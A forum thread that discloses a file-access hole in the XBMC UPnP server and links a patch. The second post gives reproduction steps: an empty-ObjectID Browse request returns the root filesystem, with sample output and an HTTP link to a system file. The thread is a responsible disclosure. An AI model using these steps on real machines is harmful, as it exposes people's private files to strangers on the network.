There is a serious security hole in XBMC UPnP server (confirmed on 11.0, 12 and latest git, Win/Mac). It is possible to get access to files outside of media library. If UPnP client issues a "Browse" (BrowseDirectChildren) action request with empty ObjectID ("") XMBC server basically will return root filesystem listing. Folders and files from the listing will be cached for http access on server side and direct links will be returned in DIDL response. Due to this, it becomes possible to browse all subfolders starting from root "/" and have http access to any individual file.
Concluding, because of this issue, a potential adversary can get access to any file on machine via UPnP Server of XBMC.
I just create a pull request on github. See link to patch : https://github.com/pamiro/xbmc/commit/70...1b9bcea33c
[PATCH] Serious Security Issue with UPnPServer.cpp
Joined: Feb 2013
2013-02-01 15:00 Post: #1
(This post was last modified: 2013-02-01 15:34 by Pavel Mironchyk.)
Joined: Feb 2013
2013-02-01 16:58 Post: #2
On how to reproduce issue using client Cling UPnP workbench.
1. Install XBMC. Start it, make sure that "Share video and music libraries through UPnP".
2. Get Cling Workbench http://4thline.org/projects/cling/workbench/
This is just nice application to invoke UPnP actions manually.
3. In cling workbench locate XBMC server, select "ContentDirectory->Browse", click on "Invoke Action" button.
4. Use the following parameters for InvokeAction:
ObjectID: << NULL >>
SortCriteria: << NULL >>
The click on Invoke
5. Check the DIDL result
Below is what I am getting on my Mac:
<container id="/Volumes/" parentID="" restricted="1" searchable="1">
<item id="/mach_kernel" parentID="" restricted="1">
If open link http://192.168.0.106:61337/%2525/10C0284...ach_kernel
I get to kernel of my OS. And I can invoke browse to other containers like /Volumes/.